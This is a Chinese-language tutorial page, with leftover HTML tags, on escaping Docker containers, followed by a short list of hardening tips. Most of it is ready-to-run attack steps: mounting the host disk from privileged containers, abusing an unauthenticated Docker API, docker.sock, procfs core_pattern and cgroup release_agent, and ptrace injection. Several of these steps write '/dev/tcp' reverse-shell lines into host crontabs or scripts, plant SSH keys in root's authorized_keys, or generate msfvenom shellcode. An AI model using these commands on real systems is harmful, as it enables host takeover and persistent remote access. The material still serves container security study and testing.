Docker逃逸技术全面指南<\/h1>

一、Docker环境判断<\/h2>

1. 检查
.dockerenv<\/code>文件<\/h3>
Docker容器内部默认会在根目录(\/)下创建一个名为.dockerenv<\/code>的隐藏文件：<\/p>
ls \/ -al
<\/span><\/span><\/code><\/pre>2. 检查\/proc\/1\/cgroup<\/code>文件<\/h3>
查看该文件内容，如果包含明显的docker标识则表明处于Docker容器中：<\/p>
cat \/proc\/1\/cgroup
<\/span><\/span><\/code><\/pre>3. 检查系统环境变量<\/h3>
Docker会自动设置一些特定的环境变量：<\/p>
echo $HOSTNAME  # 通常包含容器ID<\/span>
<\/span><\/span>env | grep DOCKER
<\/span><\/span><\/code><\/pre>二、Docker逃逸方式<\/h2>
1. 特权模式逃逸<\/h3>
利用条件<\/strong>：容器以特权模式(privileged)启动<\/p>
检测方法<\/strong>：<\/p>
cat \/proc\/self\/status | grep CapEff
<\/span><\/span># 如果CapEff值为0000003fffffffff则为特权模式<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

查看磁盘设备：<\/li>
<\/ol>
fdisk -l
<\/span><\/span><\/code><\/pre>
创建目录并挂载宿主机磁盘：<\/li>
<\/ol>
mkdir -p \/test11
<\/span><\/span>mount \/dev\/vda1 \/test11
<\/span><\/span><\/code><\/pre>
逃逸方法：<\/li>
<\/ol>

定时任务反弹shell<\/strong>：<\/li>
<\/ul>
# 先判断宿主机系统类型<\/span>
<\/span><\/span>cat \/test11\/etc\/os-release
<\/span><\/span>
<\/span><\/span># CentOS\/Ubuntu等系统：<\/span>
<\/span><\/span>echo 'bash -i >& \/dev\/tcp\/IP\/PORT 0>&1'<\/span> >> \/test11\/var\/spool\/cron\/root
<\/span><\/span>
<\/span><\/span># Alpine系统：<\/span>
<\/span><\/span>echo 'bash -i >& \/dev\/tcp\/IP\/PORT 0>&1'<\/span> >> \/test11\/etc\/crontabs\/root
<\/span><\/span><\/code><\/pre>
写入SSH公钥<\/strong>：<\/li>
<\/ul>
ssh-keygen -t rsa -b 4096<\/span> -f my_key -N ""<\/span>
<\/span><\/span>echo "公钥内容"<\/span> >> \/test11\/root\/.ssh\/authorized_keys
<\/span><\/span>chmod 600<\/span> \/test11\/root\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>2. Docker API未授权访问<\/h3>
利用条件<\/strong>：2375端口暴露且未授权<\/p>
检测方法<\/strong>：

访问http:\/\/target:2375\/version<\/code>，返回版本信息则存在漏洞<\/p>
利用步骤<\/strong>：<\/p>

查看目标容器：<\/li>
<\/ol>
docker -H tcp:\/\/IP:2375 ps
<\/span><\/span><\/code><\/pre>
创建新容器并挂载宿主机目录：<\/li>
<\/ol>
docker -H tcp:\/\/IP:2375 run -id -v \/:\/tmp alpine:latest
<\/span><\/span><\/code><\/pre>
进入容器并利用挂载的目录逃逸（方法同特权模式）<\/li>
<\/ol>
3. Docker Socket挂载逃逸<\/h3>
利用条件<\/strong>：容器内挂载了\/var\/run\/docker.sock<\/code><\/p>
检测方法<\/strong>：<\/p>
ls -lah \/var\/run\/docker.sock
<\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

在容器内创建新容器并挂载宿主机目录：<\/li>
<\/ol>
docker run -it -v \/:\/tmp ubuntu \/bin\/bash
<\/span><\/span><\/code><\/pre>
进入新容器后利用挂载的目录逃逸（方法同特权模式）<\/li>
<\/ol>
4. Procfs危险挂载逃逸<\/h3>
利用条件<\/strong>：挂载了宿主机的\/proc<\/code>目录<\/p>
检测方法<\/strong>：<\/p>
find \/ -name core_pattern | wc -l
<\/span><\/span># 如果找到2个core_pattern文件则可能挂载了宿主机的procfs<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

获取容器在宿主机上的绝对路径：<\/li>
<\/ol>
cat \/proc\/mounts | xargs -d ','<\/span> -n 1<\/span> | grep workdir
<\/span><\/span># 将路径中的work替换为merged<\/span>
<\/span><\/span><\/code><\/pre>
创建反弹shell脚本：<\/li>
<\/ol>
echo '#!\/bin\/sh'<\/span> > \/tmp\/exp.py
<\/span><\/span>echo 'bash -i >& \/dev\/tcp\/IP\/PORT 0>&1'<\/span> >> \/tmp\/exp.py
<\/span><\/span>chmod +x \/tmp\/exp.py
<\/span><\/span><\/code><\/pre>
修改core_pattern：<\/li>
<\/ol>
echo -e "|\/容器绝对路径\/tmp\/exp.py \rcore "<\/span> > \/挂载点\/proc\/sys\/kernel\/core_pattern
<\/span><\/span><\/code><\/pre>
触发崩溃执行脚本<\/li>
<\/ol>
5. Cgroup配置错误逃逸<\/h3>
利用条件<\/strong>：<\/p>

root用户运行<\/li>
具有SYS_ADMIN权限<\/li>
AppArmor未配置<\/li>
Cgroup v1以读写方式挂载<\/li>
<\/ul>
检测方法<\/strong>：<\/p>
cat \/proc\/self\/status | grep CapEff  # 检查SYS_ADMIN<\/span>
<\/span><\/span>mount | grep cgroup  # 检查挂载方式<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

创建并挂载Cgroup：<\/li>
<\/ol>
mkdir \/tmp\/test3
<\/span><\/span>mount -t cgroup -o memory cgroup \/tmp\/test3
<\/span><\/span>mkdir \/tmp\/test3\/conf
<\/span><\/span><\/code><\/pre>
设置通知机制：<\/li>
<\/ol>
echo 1<\/span> > \/tmp\/test3\/conf\/notify_on_release
<\/span><\/span><\/code><\/pre>
获取宿主机路径：<\/li>
<\/ol>
host_path=<\/span>`<\/span>sed -n 's\/.*\perdir=$[^,]*$.*\/\1\/p'<\/span> \/etc\/mtab`<\/span>
<\/span><\/span><\/code><\/pre>
设置release_agent：<\/li>
<\/ol>
echo "<\/span>$host_path\/cmd"<\/span> > \/tmp\/test3\/release_agent
<\/span><\/span><\/code><\/pre>
创建反弹脚本：<\/li>
<\/ol>
echo '#!\/bin\/sh'<\/span> > \/cmd
<\/span><\/span>echo "bash -i >& \/dev\/tcp\/IP\/PORT 0>&1"<\/span> >> \/cmd
<\/span><\/span>chmod +x \/cmd
<\/span><\/span><\/code><\/pre>
触发执行：<\/li>
<\/ol>
sh -c "echo \$\$ > \/tmp\/test3\/conf\/cgroup.procs"<\/span>
<\/span><\/span><\/code><\/pre>6. SYS_PTRACE进程注入逃逸<\/h3>
利用条件<\/strong>：<\/p>

具有SYS_PTRACE权限<\/li>
共享宿主机进程命名空间(--pid=host)<\/li>
root权限运行<\/li>
<\/ul>
检测方法<\/strong>：<\/p>
capsh --print | grep cap_sys_ptrace  # 检查权限<\/span>
<\/span><\/span>ps aux | grep dockerd  # 检查是否共享进程空间<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

获取或编译进程注入工具<\/li>
生成shellcode：<\/li>
<\/ol>
msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=<\/span>IP LPORT=<\/span>PORT -f c
<\/span><\/span><\/code><\/pre>
注入宿主机进程<\/li>
<\/ol>
三、CDK工具利用<\/h2>
功能<\/strong>：<\/p>

Evaluate：容器内部信息收集<\/li>
Exploit：提供容器逃逸、持久化、横向移动等利用方式<\/li>
Tool：常用Linux命令和Docker\/K8s API交互命令<\/li>
<\/ol>
使用方法<\/strong>：<\/p>

上传CDK到容器<\/li>
信息收集：<\/li>
<\/ol>
.\/cdk evaluate
<\/span><\/span><\/code><\/pre>
利用检测到的漏洞模块进行逃逸<\/li>
<\/ol>
四、防御建议<\/h2>

避免使用特权模式运行容器<\/li>
限制容器能力，移除不必要的capabilities<\/li>
配置适当的AppArmor或SELinux策略<\/li>
避免挂载敏感目录如\/proc、\/var\/run\/docker.sock等<\/li>
确保Docker API有适当的认证和授权<\/li>
定期更新Docker和主机系统<\/li>
使用只读文件系统运行容器<\/li>
限制容器资源使用和权限<\/li>
<\/ol>
通过以上方法，可以有效防止Docker逃逸攻击，确保容器环境的安全性。<\/p>